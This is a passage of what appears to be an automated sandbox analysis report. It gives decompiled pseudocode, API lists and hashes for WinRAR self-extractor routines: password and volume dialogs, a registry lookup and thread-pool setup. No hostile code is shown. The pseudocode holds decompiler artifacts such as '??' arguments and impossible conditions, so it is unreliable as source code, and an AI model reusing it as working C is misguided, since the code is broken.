                                                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                                                    • Opcode ID: b6a88a6335596dfe2aabd85249c798dff918f00260fa38ba3083977d0d0b9e6b
                                                                                                                                                    • Instruction ID: b3f0a085e38d1cb8eaf828c0968b20399f4cf7399c904652a2529d61645f893b
                                                                                                                                                    • Opcode Fuzzy Hash: b6a88a6335596dfe2aabd85249c798dff918f00260fa38ba3083977d0d0b9e6b
                                                                                                                                                    • Instruction Fuzzy Hash: 5D31B371A2424AAFEF21EF68EC04BFE7BF9EFA4750F004015EA45A7189D7744A44CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A3B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E0122A3B0(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E0121130B(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0x126fca8 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0x126fca8), ( *0x126fca8)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E0121BBC5(__eflags,  *( *0x126fca8));
					_t22 = E012110F0(_t30, E0121DD11(_t25, 0x8e),  *( *0x126fca8), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x126fca8));
					goto L13;
				}
				goto L6;
			}













                                                                                                                                                    0x0122a3b1
                                                                                                                                                    0x0122a3b6
                                                                                                                                                    0x0122a3bb
                                                                                                                                                    0x0122a3c0
                                                                                                                                                    0x0122a3d8
                                                                                                                                                    0x0122a468
                                                                                                                                                    0x0122a46a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a46a
                                                                                                                                                    0x0122a3de
                                                                                                                                                    0x0122a3e4
                                                                                                                                                    0x0122a457
                                                                                                                                                    0x0122a459
                                                                                                                                                    0x0122a45f
                                                                                                                                                    0x0122a462
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a462
                                                                                                                                                    0x0122a3e9
                                                                                                                                                    0x0122a3fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a3fd
                                                                                                                                                    0x0122a3ee
                                                                                                                                                    0x0122a3f1
                                                                                                                                                    0x0122a44d
                                                                                                                                                    0x0122a453
                                                                                                                                                    0x0122a437
                                                                                                                                                    0x0122a438
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a438
                                                                                                                                                    0x0122a3f3
                                                                                                                                                    0x0122a3f6
                                                                                                                                                    0x0122a435
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a435
                                                                                                                                                    0x0122a3fb
                                                                                                                                                    0x0122a40a
                                                                                                                                                    0x0122a423
                                                                                                                                                    0x0122a428
                                                                                                                                                    0x0122a42a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a431
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a431
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121130B: GetDlgItem.USER32(00000000,00003021), ref: 0121134F
                                                                                                                                                      • Part of subcall function 0121130B: SetWindowTextW.USER32(00000000,012425B4), ref: 01211365
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0122A438
                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0122A44D
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0122A462
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                                                    • Opcode ID: 4ab25a64587756421911c7e63284734ab1d18c7906d54076b7a27e59b3decfc6
                                                                                                                                                    • Instruction ID: b7908be9cc89019078142d273391405c824a92acf3b4412fa5a9eb283909b4de
                                                                                                                                                    • Opcode Fuzzy Hash: 4ab25a64587756421911c7e63284734ab1d18c7906d54076b7a27e59b3decfc6
                                                                                                                                                    • Instruction Fuzzy Hash: 7E119332264261BFEB21DF6CBD4DF6A3BA9EF5AB40F004010F7409B9E8C662E415C721
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121D103, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E0121D103(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E012214F2( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E0121FD3B(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E0121DCAB();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x10d79b0
					_t30 = E01235739(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E0121CF20);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x124d158 +  *_t30 * 0xc; // 0x12436b8
						E01235DA0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}














                                                                                                                                                    0x0121d103
                                                                                                                                                    0x0121d103
                                                                                                                                                    0x0121d103
                                                                                                                                                    0x0121d104
                                                                                                                                                    0x0121d108
                                                                                                                                                    0x0121d10f
                                                                                                                                                    0x0121d115
                                                                                                                                                    0x0121d125
                                                                                                                                                    0x0121d12b
                                                                                                                                                    0x0121d12f
                                                                                                                                                    0x0121d132
                                                                                                                                                    0x0121d13d
                                                                                                                                                    0x0121d13d
                                                                                                                                                    0x0121d145
                                                                                                                                                    0x0121d148
                                                                                                                                                    0x0121d183
                                                                                                                                                    0x0121d14a
                                                                                                                                                    0x0121d14a
                                                                                                                                                    0x0121d14d
                                                                                                                                                    0x0121d162
                                                                                                                                                    0x0121d163
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d14f
                                                                                                                                                    0x0121d152
                                                                                                                                                    0x0121d157
                                                                                                                                                    0x0121d158
                                                                                                                                                    0x0121d168
                                                                                                                                                    0x0121d16b
                                                                                                                                                    0x0121d16d
                                                                                                                                                    0x0121d16e
                                                                                                                                                    0x0121d173
                                                                                                                                                    0x0121d173
                                                                                                                                                    0x0121d152
                                                                                                                                                    0x0121d14d
                                                                                                                                                    0x0121d18f
                                                                                                                                                    0x0121d195
                                                                                                                                                    0x0121d199
                                                                                                                                                    0x0121d1a3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d1a9
                                                                                                                                                    0x0121d1af
                                                                                                                                                    0x0121d1b8
                                                                                                                                                    0x0121d1c0
                                                                                                                                                    0x0121d1c0
                                                                                                                                                    0x0121d117
                                                                                                                                                    0x0121d117
                                                                                                                                                    0x0121d117
                                                                                                                                                    0x0121d117
                                                                                                                                                    0x0121d1c7

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fprintf_l_strncpy
                                                                                                                                                    • String ID: $%s$@%s
                                                                                                                                                    • API String ID: 1857242416-834177443
                                                                                                                                                    • Opcode ID: e856261d012e14d909c51cfa2ad0138d8f361761aea361b5b83ce406085db371
                                                                                                                                                    • Instruction ID: a65d63f18df78ad1a995a446036ed6626dc5263c4083812fdf78ff08443ae7b4
                                                                                                                                                    • Opcode Fuzzy Hash: e856261d012e14d909c51cfa2ad0138d8f361761aea361b5b83ce406085db371
                                                                                                                                                    • Instruction Fuzzy Hash: 92218E7256020DEBEF21DEE8DC49FEE3BE8AB24300F040416FE1496165E375D655CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A8E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E0122A8E0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E0121130B(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E0121EBED(_t24, 0x1265a70,  &_v260);
					E0121EC38( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                                                                                                                    0x0122a8ea
                                                                                                                                                    0x0122a8ee
                                                                                                                                                    0x0122a8f2
                                                                                                                                                    0x0122a90b
                                                                                                                                                    0x0122a97a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a97c
                                                                                                                                                    0x0122a90d
                                                                                                                                                    0x0122a913
                                                                                                                                                    0x0122a974
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a974
                                                                                                                                                    0x0122a918
                                                                                                                                                    0x0122a927
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a927
                                                                                                                                                    0x0122a91d
                                                                                                                                                    0x0122a920
                                                                                                                                                    0x0122a946
                                                                                                                                                    0x0122a958
                                                                                                                                                    0x0122a965
                                                                                                                                                    0x0122a96a
                                                                                                                                                    0x0122a92d
                                                                                                                                                    0x0122a92e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a92e
                                                                                                                                                    0x0122a925
                                                                                                                                                    0x0122a92b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a92b
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121130B: GetDlgItem.USER32(00000000,00003021), ref: 0121134F
                                                                                                                                                      • Part of subcall function 0121130B: SetWindowTextW.USER32(00000000,012425B4), ref: 01211365
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0122A92E
                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0122A946
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0122A974
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                    • String ID: GETPASSWORD1
                                                                                                                                                    • API String ID: 445417207-3292211884
                                                                                                                                                    • Opcode ID: 8497d6fa8441c1ec7a559fa542126ab226a360d5c861969278b9087e93a0e42e
                                                                                                                                                    • Instruction ID: 34998c9092ec5516f7754a321aa43735c155006ba8658eec91580baacfd864fc
                                                                                                                                                    • Opcode Fuzzy Hash: 8497d6fa8441c1ec7a559fa542126ab226a360d5c861969278b9087e93a0e42e
                                                                                                                                                    • Instruction Fuzzy Hash: C911E53AA60229B6DB229A79AD49FFF7B7CFB59700F020011FB45A7C84C2A199518770
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121B437, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E0121B437(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E0121B746(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E01231438(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E01231438(_t23);
							if(_t13 == 0) {
								_t14 = E012333F3(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E012356A2(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E01213FD6(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}











                                                                                                                                                    0x0121b438
                                                                                                                                                    0x0121b43f
                                                                                                                                                    0x0121b444
                                                                                                                                                    0x0121b447
                                                                                                                                                    0x0121b44e
                                                                                                                                                    0x0121b46b
                                                                                                                                                    0x0121b46f
                                                                                                                                                    0x0121b47a
                                                                                                                                                    0x0121b47b
                                                                                                                                                    0x0121b47c
                                                                                                                                                    0x0121b482
                                                                                                                                                    0x0121b485
                                                                                                                                                    0x0121b48a
                                                                                                                                                    0x0121b48b
                                                                                                                                                    0x0121b48c
                                                                                                                                                    0x0121b495
                                                                                                                                                    0x0121b49f
                                                                                                                                                    0x0121b497
                                                                                                                                                    0x0121b49b
                                                                                                                                                    0x0121b49b
                                                                                                                                                    0x0121b4a9
                                                                                                                                                    0x0121b4ab
                                                                                                                                                    0x0121b4b0
                                                                                                                                                    0x0121b4b8
                                                                                                                                                    0x0121b4ba
                                                                                                                                                    0x0121b4ba
                                                                                                                                                    0x0121b485
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121b4be
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • _swprintf.LIBCMT ref: 0121B45E
                                                                                                                                                      • Part of subcall function 01213FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01213FE9
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0121B47C
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0121B48C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                                    • String ID: %c:\
                                                                                                                                                    • API String ID: 525462905-3142399695
                                                                                                                                                    • Opcode ID: c24dac3989ccd90663f5507b7ff25a582275b76a0fb1b3211a3c86746aa3b1e0
                                                                                                                                                    • Instruction ID: 36aecd7eef4530438eb37be21834fefe8d224a56f1b9644548c4b7088ea0231c
                                                                                                                                                    • Opcode Fuzzy Hash: c24dac3989ccd90663f5507b7ff25a582275b76a0fb1b3211a3c86746aa3b1e0
                                                                                                                                                    • Instruction Fuzzy Hash: 0301D6675A43136AE630EB799C85D7BB7FCEFB5170784C816FA44C2445EA34D45083B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01220618, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E01220618(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x124ff50);
					E01216E21(E01216E26(_t19), 0x124ff50, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









                                                                                                                                                    0x01220618
                                                                                                                                                    0x01220618
                                                                                                                                                    0x01220620
                                                                                                                                                    0x01220624
                                                                                                                                                    0x01220625
                                                                                                                                                    0x01220629
                                                                                                                                                    0x0122062b
                                                                                                                                                    0x0122062b
                                                                                                                                                    0x01220634
                                                                                                                                                    0x01220636
                                                                                                                                                    0x01220636
                                                                                                                                                    0x01220638
                                                                                                                                                    0x01220640
                                                                                                                                                    0x01220642
                                                                                                                                                    0x01220642
                                                                                                                                                    0x01220644
                                                                                                                                                    0x0122064a
                                                                                                                                                    0x01220651
                                                                                                                                                    0x01220665
                                                                                                                                                    0x0122066b
                                                                                                                                                    0x01220671
                                                                                                                                                    0x0122067d
                                                                                                                                                    0x01220683
                                                                                                                                                    0x0122068d
                                                                                                                                                    0x01220699
                                                                                                                                                    0x01220699
                                                                                                                                                    0x0122069f
                                                                                                                                                    0x012206a7
                                                                                                                                                    0x012206ad
                                                                                                                                                    0x012206b6

                                                                                                                                                    APIs
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0121AB05,00000008,?,00000000,?,0121CAC8,?,00000000), ref: 01220651
                                                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0121AB05,00000008,?,00000000,?,0121CAC8,?,00000000), ref: 0122065B
                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0121AB05,00000008,?,00000000,?,0121CAC8,?,00000000), ref: 0122066B
                                                                                                                                                    Strings
                                                                                                                                                    • Thread pool initialization failed., xrefs: 01220683
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                                                    • Opcode ID: a2b0aca9bec5ac03416d496a9c0164078ed1b54c1efea695bcc8a30ec986d980
                                                                                                                                                    • Instruction ID: 6b0afdaf568c153ddf71b495d59e7bab8a187b650e4747dc4b1f54d65b85820f
                                                                                                                                                    • Opcode Fuzzy Hash: a2b0aca9bec5ac03416d496a9c0164078ed1b54c1efea695bcc8a30ec986d980
                                                                                                                                                    • Instruction Fuzzy Hash: FE11C6B1510719AFD3314F7AD8889ABFBECEBA5244F20082EF2DA86200D6B01980CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A81F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E0122A81F(intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				void* _v12;
				int _v16;
				char _v4112;
				short _v8208;
				long _t19;
				signed int _t30;
				void* _t35;

				_t19 = 0x200c;
				E0122E1C0();
				_t36 =  *0x1259470;
				if( *0x1259470 != 0) {
					E0122BCF0(_t36, _a4,  &_v8208, 0x800);
					_t19 = RegOpenKeyExW(0x80000001, L"Software\\WinRAR SFX", 0, 1,  &_v12);
					if(0x200c == 0) {
						_v8 = 0x1000;
						if(RegQueryValueExW(_v12,  &_v8208, 0,  &_v16,  &_v4112,  &_v8) == 0) {
							_t30 = _v8 >> 1;
							_v8 = _t30;
							if(_t30 >= 0x7ff) {
								_t30 = 0x7ff;
							}
							 *((short*)(_t35 + _t30 * 2 - 0x100c)) = 0;
							E0121FD96(_a4,  &_v4112, _a8);
						}
						return RegCloseKey(_v12);
					}
				}
				return _t19;
			}











                                                                                                                                                    0x0122a822
                                                                                                                                                    0x0122a827
                                                                                                                                                    0x0122a82c
                                                                                                                                                    0x0122a833
                                                                                                                                                    0x0122a848
                                                                                                                                                    0x0122a85f
                                                                                                                                                    0x0122a867
                                                                                                                                                    0x0122a86c
                                                                                                                                                    0x0122a893
                                                                                                                                                    0x0122a89d
                                                                                                                                                    0x0122a89f
                                                                                                                                                    0x0122a8a4
                                                                                                                                                    0x0122a8a6
                                                                                                                                                    0x0122a8a6
                                                                                                                                                    0x0122a8ad
                                                                                                                                                    0x0122a8bf
                                                                                                                                                    0x0122a8bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122a8c7
                                                                                                                                                    0x0122a867
                                                                                                                                                    0x0122a8d0

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,?,?,?,00000800), ref: 0122A85F
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0122A88B
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0122A8C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID: Software\WinRAR SFX
                                                                                                                                                    • API String ID: 3677997916-754673328
                                                                                                                                                    • Opcode ID: 99a4911d935ee9c96cb09995e5ce8d3fb95d2f3560457ef3302ddb72d73cad49
                                                                                                                                                    • Instruction ID: 4c100978cf9c2af8994af57888a358305f833e85ce376118ba444a73efb1e240
                                                                                                                                                    • Opcode Fuzzy Hash: 99a4911d935ee9c96cb09995e5ce8d3fb95d2f3560457ef3302ddb72d73cad49
                                                                                                                                                    • Instruction Fuzzy Hash: 21113D74A10218BAEB16DF94DC48FED7BBCEB08301F0041A6EA05E2150DBB09A95DB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D1E1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122D1E1(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0x126cc80 = _a12;
				 *0x126cc84 = _a16;
				 *0x1257464 = _a20;
				if( *0x1257443 == 0) {
					if( *0x1257442 == 0) {
						_t19 = E0122B820;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x124fed4, _t16,  *0x1257438, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x124fed0, L"RENAMEDLG",  *0x1257448, E0122CB10, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}






                                                                                                                                                    0x0122d1ee
                                                                                                                                                    0x0122d1f6
                                                                                                                                                    0x0122d1fe
                                                                                                                                                    0x0122d203
                                                                                                                                                    0x0122d210
                                                                                                                                                    0x0122d21a
                                                                                                                                                    0x0122d21f
                                                                                                                                                    0x0122d249
                                                                                                                                                    0x0122d260
                                                                                                                                                    0x0122d265
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122d247
